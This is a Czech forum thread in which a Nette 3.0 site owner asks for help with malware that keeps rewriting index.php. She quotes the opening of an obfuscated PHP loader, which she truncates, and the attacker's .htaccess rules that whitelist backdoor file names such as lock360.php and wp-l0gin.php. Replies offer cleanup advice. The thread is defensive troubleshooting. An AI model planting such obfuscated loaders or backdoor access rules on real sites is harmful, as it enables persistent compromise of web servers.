Virus v souboru index.php a nette aplikace verze 3.0

iru
Člen | 110
+
0
-

Zdravím,

nějakým způsobem se mi do aplikace dostává virus, který přepisuje soubor index.php i když jsem vyměnila FTP přístup a povolila jen svoji IP adresu.
Jedná se o něco takového: https://pawno.cz/index.php?…
Do index.php je vložen na začátek souboru tento kód:

<?php
$OO0__00_OO=urldecode("%6f%41%2d%62%4e%6e%4b%37%4c%35%5f%4a%55%74%52%78%49%59%2b%57%43%61%39%33%56%6b%30%77%4d%31%4f%65%53%44%64%42%32%6a%2f%6c%73%58%66%71%70%68%6d%2a%54%47%76%51%48%72%50%79%63%5c%34%7a%75%46%36%69%5a%67%38%45");$OO_0O_0O_0=$OO0__00_OO[44].$OO0__00_OO[53].$OO0__00_OO[31].$OO0__00_OO[65].$OO0__00_OO[10].$OO0__00_OO[53].$OO0__00_OO[31].$OO0__00_OO[44]
......nevypisuji celé, protože je to dlouhé a zabralo by to zbytečně moc místa....
?>
<?php

snažím se najít řešení a nevím odkud se to tam dostává, protože když soubor smažu a nahraju správný, tak se mi tam za pár hodin objeví znovu a teď naposledy mi to přepsalo i práva, takže ho nemůžu smazat, o to jsem nyní požádala ze strany hostingu. Aplikace je v nette 3.0 a našla jsem toto: https://phpfashion.com/…aktualizujte a chtěla jsem zkusit aktualizovat. Stáhla jsem si tedy verzi 3.0 odtud https://nette.org/cs/packages, kde je psáno, že je kompatibilní s PHP 7.1. Na mém serveru běží PHP 7.1, ale když jsem přepsala vendor, tak na mě vyskočila hláška, že to vyžaduje PHP 7.2 .
Můj dotaz tedy zní, zda to může pomoci a mám se snažit o tu aktualizaci, nebo hledám na špatném místě. Máte někdo nějaké nápady?

PS: našla jsem ještě nějaké nepatřičné soubory ve složce „filemanager“ (používám tinymce), ty jsem smazala, tam už se nic neobjevilo, jen dochází k přepisu souboru index.php. Do administrace jsem vyměnila také heslo.
Budu vděčná za každou pomoc. Děkuji moc.

Šaman
Člen | 2632
+
+1
-

Ohledně té bezpečnostní chyby – jestli nepoužíváš MicroPresenter, tak jen smaž soubor MicroPresenter.php a mělo by to stačit (nemusíš pak kvůli téhle chybě aktualizovat). Ale s tvým přepsáním indexu to, myslím, nebude souviset.

Editoval Šaman (24. 9. 2021 10:30)

Michal Kumžák
Člen | 106
+
+1
-

Projdi si místa kde se provádí upload souboru, jestli tam něco takového máš. Můžeš tam mít i někde již něco nahráno a útočníkovi to pak stačí jen jednou začas spustit.

iru
Člen | 110
+
0
-

a toto jsem našla v .htaccess

`<FilesMatch „.(py|exe|php)$“>
Order allow,deny
Deny from all
</FilesMatch>
<FilesMatch „^(about.php|radio.php|index.php|content.php|lock360.php|admin.php|wp-login.php|wp-l0gin.php|wp-theme.php|wp-scripts.php|wp-editor.php)$“>
Order allow,deny
Allow from all
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ – [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>`

a jeho práva na 444

iru
Člen | 110
+
0
-

Šaman napsal(a):

Ohledně té bezpečnostní chyby – jestli nepoužíváš MicroPresenter, tak jen smaž soubor MicroPresenter.php a mělo by to stačit (nemusíš pak kvůli téhle chybě aktualizovat). Ale s tvým přepsáním indexu to, myslím, nebude souviset.

Díky pro jistotu jsem provedla…

iru
Člen | 110
+
0
-

Michal Kumžák napsal(a):

Projdi si místa kde se provádí upload souboru, jestli tam něco takového máš. Můžeš tam mít i někde již něco nahráno a útočníkovi to pak stačí jen jednou začas spustit.

našla jsem ještě něco mezi soubory js od jquery, tak snad to už pomůže… jak jsem výše psala obsah .htaccess napadeného, tak jsem hledala názvy těch podstrčeně povolených souborů

Šaman
Člen | 2632
+
+2
-

iru napsal(a):
<FilesMatch „^(about.php|radio.php|index.php|content.php|lock360.php|admin.php|wp-login.php|wp-l0gin.php|wp-theme.php|wp-scripts.php|wp-editor.php)$“>

Jestli tam máš WordPress, tak to je samo o sobě velká bezpečnostní díra. Rozhodně ho pravidelně aktualizuj.

iru
Člen | 110
+
0
-

Šaman napsal(a):

iru napsal(a):
<FilesMatch „^(about.php|radio.php|index.php|content.php|lock360.php|admin.php|wp-login.php|wp-l0gin.php|wp-theme.php|wp-scripts.php|wp-editor.php)$“>

Jestli tam máš WordPress, tak to je samo o sobě velká bezpečnostní díra. Rozhodně ho pravidelně aktualizuj.

ne wordpress tam není, já ho nepoužívám nikdy…

Šaman
Člen | 2632
+
+1
-

No, že ty wp-*** soubory jsou nejspíš záležitost WordPressu. Takže to vypadá, že jestli ho tam nemáš, tak tě napadl nějakej vir, co si tam dělá naslepo zadní vrátka pro WP…

Edit: Aha, jestli dobře chápu, tyhle soubory jsou právě preventivně vyňaté z Allow from all. To už dává smysl, teda pokud bys tam ten WP měl :)

Editoval Šaman (24. 9. 2021 18:34)

iru
Člen | 110
+
0
-

Šaman napsal(a):

No, že ty wp-*** soubory jsou nejspíš záležitost WordPressu. Takže to vypadá, že jestli ho tam nemáš, tak tě napadl nějakej vir, co si tam dělá naslepo zadní vrátka pro WP…

Edit: Aha, jestli dobře chápu, tyhle soubory jsou právě preventivně vyňaté z Allow from all. To už dává smysl, teda pokud bys tam ten WP měl :)

ano přesně tak… tak se mi zdá, že byl kontaminovaný filemanager, který používám pro tinyMce… protože většina souborů byla skrytá tam a po promazání se zatím zdá klid… Tak třeba když někdo bude mít podobný problém to pomůže v hledání…